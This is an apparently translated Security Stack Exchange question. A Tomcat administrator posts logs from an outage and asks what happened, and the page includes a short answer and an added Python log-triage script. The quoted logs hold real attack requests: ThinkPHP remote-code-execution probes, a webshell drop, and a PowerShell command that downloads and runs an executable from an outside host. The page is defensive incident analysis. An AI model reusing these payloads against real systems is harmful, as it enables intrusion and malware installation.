
Java web application hosted in Tomcat was down for more than 10 minutes, and the logs contain a PowerShell attack

Security user
Asked on 2019-07-17 13:22:02
Answers 1 · Views 255 · Followers 0 · Score -1

We have a Java web application running in Tomcat, hosted in AWS. The operating system used on the server is CentOS. Today it was inaccessible for more than 10 minutes. When we got in, we checked the logs to find out what had happened. Interestingly, the logs contained the following:

Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.

When I checked further, I found that there were no logs between 2:22 PM and 2:39 PM, which is the time range during which the server was unreachable.

Application log:

2019-07-17 14:20:11.620 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39208, 0) already exists.
2019-07-17 14:20:53.469 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39209, 0) already exists.
2019-07-17 14:21:32.329 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.473 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.987 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39213, 0) already exists.
2019-07-17 14:22:34.338 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39215, 0) already exists.
2019-07-17 14:45:04.900 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39217, 0) already exists.
2019-07-17 14:45:49.877 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39218, 0) already exists.
2019-07-17 14:47:14.155 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39219, 0) already exists.
2019-07-17 14:47:20.484 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39220, 0) already exists.
2019-07-17 14:49:09.092 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39221, 0) already exists.
2019-07-17 14:49:54.520 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39223, 0) already exists.

Access log:

[17/Jul/2019:14:22:27 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 200 -
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 166
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 431
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 281
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 1131
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 537
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 3484
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 23255
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3170
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44314
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3512
[17/Jul/2019:14:22:29 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3451
[17/Jul/2019:14:22:30 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 11953
[17/Jul/2019:14:22:31 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 16527
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44218
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 4695
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 3675
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7287
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 8066
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 9802
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 2634
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44122
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 2132
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44028
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 1800
[17/Jul/2019:14:39:38 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 4926
[17/Jul/2019:14:39:38 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:38 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:39 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:39:40 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 13606
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:39:42 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:42 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "POST /tmUnblock.cgi HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 200 1724
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:44 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354390370 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:44 +0530] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/vaadinBootstrap.js?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/themes/abcerp/styles.css?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354393114 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/popupbutton/popupbutton.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354389975 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/themes/valo/shared/img/spinner.gif HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/fi_jasoft_dragdroplayouts/dragdroplayouts.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_timeline/styles.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_calendar/calendar.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/easyuploads.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:47 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/filtertable/filtertable.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:54 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7730
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /?v-1563354393116 HTTP/1.1" 200 4843
[17/Jul/2019:14:39:55 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/abcerp/img/symphony.png HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Light-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Regular-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /APP/global/0/legacy/0/20180410112140264.png HTTP/1.1" 200 12363
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 8023
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=3 HTTP/1.1" 200 237
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=3 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:40:12 +0530] "GET / HTTP/1.1" 200 1706

Catalina log:

Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server version:        Apache Tomcat/7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server built:          Sep 14 2016 12:12:26 UTC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server number:         7.0.72.0
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Name:               Linux
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Version:            3.10.0-693.21.1.el7.x86_64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Architecture:          amd64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Java Home:             /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Version:           1.7.0_171-mockbuild_2018_02_27_14_27-b00
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Vendor:            Oracle Corporation
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_BASE:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_HOME:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.config.file=/var/abc/ERP/apache-tomcat-7.0.72/conf/logging.properties
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djdk.tls.ephemeralDHKeySize=2048
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dfile.encoding=UTF8
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dlog4j.ignoreTCL=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dserver.name=
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dorg.apache.catalina.loader.WebappClassLoader.ENABLE_CLEAR_REFERENCES=false
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dmail.debug=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Duser.timezone=GMT+5.30
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xms12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xmx12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:MaxPermSize=4096m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSClassUnloadingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSPermGenSweepingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+UseConcMarkSweepGC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:NewRatio=2
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDetails
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDateStamps
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:-HeapDumpOnOutOfMemoryError
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:HeapDumpPath=/var/abc/dump
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.endorsed.dirs=/var/abc/ERP/apache-tomcat-7.0.72/endorsed
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.base=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.home=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.io.tmpdir=/var/abc/ERP/apache-tomcat-7.0.72/temp
Jul 17, 2019 2:00:17 AM org.apache.catalina.core.AprLifecycleListener lifecycleEvent
INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: /usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:00:18 AM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 1898 ms
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardService startInternal
INFO: Starting service Catalina
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.72
Jul 17, 2019 2:00:18 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:33 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:33 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:00:53 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deploying web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war
Jul 17, 2019 2:00:53 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:56 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [/abcERP] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:56 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deployment of web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war has finished in 18,798 ms
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager has finished in 78 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples has finished in 388 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs has finished in 36 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager has finished in 29 ms
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.Catalina start
INFO: Server startup in 54377 ms
Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.
Jul 17, 2019 3:33:04 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "tomcat"
Jul 17, 2019 3:33:07 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "manager"
Jul 17, 2019 3:33:10 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "admin"
Jul 17, 2019 3:33:15 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "root"

Can someone explain what happened?


1 Answer

Security user

Posted on 2019-07-17 13:34:14

It looks like some malicious actor's automated attack tool trying to exploit Tomcat. There is no guarantee that the downtime is associated with this attack, since Tomcat instances can receive similar attacks frequently. I would suggest looking at other things that could have caused the downtime.

Score 0
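An added example, not part of the question or the answer: a Python triage script that parses access-log lines in the format shown in the question, flags the request patterns quoted there (the ThinkPHP invokefunction probes, the tmUnblock.cgi request and the hydra.php?xcmd= PowerShell downloader), finds the silent window in the log and places each flagged request before, during or after that window, which is the check the answer is pointing at. The indicator strings and the log format come from the question; the sample lines, the placeholder download host and the five-minute gap threshold are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Tomcat access-log shape from the question:
# [dd/Mon/yyyy:HH:MM:SS +zzzz] "METHOD /path HTTP/1.1" status bytes
LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Indicator substrings lifted from the request paths quoted in the question.
INDICATORS = {
    "thinkphp_invokefunction": ["invokefunction", "call_user_func_array"],
    "router_cgi_probe": ["tmUnblock.cgi"],
    "webshell_cmd_param": ["hydra.php", "xcmd="],
    "powershell_downloader": ["powershell", "DownloadFile("],
}

def classify(path):
    """Sorted indicator tags for a path; raw and %-decoded forms are both searched."""
    haystack = (path + " " + unquote(path)).lower()
    return sorted(tag for tag, needles in INDICATORS.items()
                  if any(n.lower() in haystack for n in needles))

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m.group("ts"), TS_FMT),
            "status": int(m.group("status")), "path": m.group("path"),
            "tags": classify(m.group("path"))}

def analyze(log_text, gap_threshold=timedelta(minutes=5)):
    """Flag suspicious requests, find silent windows (no request for gap_threshold
    or longer) and place each flagged request before/during/after the first one."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    flagged = [e for e in events if e["tags"]]
    gaps = [(p["ts"], c["ts"]) for p, c in zip(events, events[1:])
            if c["ts"] - p["ts"] >= gap_threshold]
    placement = {}
    if gaps:
        start, end = gaps[0]
        for e in flagged:
            # a probe first seen after the window cannot be what caused it
            pos = ("before" if e["ts"] <= start else
                   "after" if e["ts"] >= end else "during")
            placement[pos] = placement.get(pos, 0) + 1
    return {"events": len(events), "flagged": flagged,
            "gaps": gaps, "flagged_vs_gap": placement}

# Constructed sample modelled on the question's access log (placeholder download host).
SAMPLE_LOG = r"""
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 1800
[17/Jul/2019:14:39:38 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "POST /tmUnblock.cgi HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://malware-host.invalid/download.exe','d.exe') HTTP/1.1" 200 1724
[17/Jul/2019:14:40:12 +0530] "GET / HTTP/1.1" 200 1706
"""

if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    print("silent windows:", r["gaps"], "\nflagged vs first window:", r["flagged_vs_gap"])
```

On the sample, the only silent window runs from 14:22:37 to 14:39:38 and all three flagged requests land after it, which is consistent with the answer's point that the scan traffic visible here does not by itself explain the outage.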
Original page content provided by Security; translation supported by the Tencent Cloud Xiaowei IT-domain engine.
Original link: https://security.stackexchange.com/questions/213620
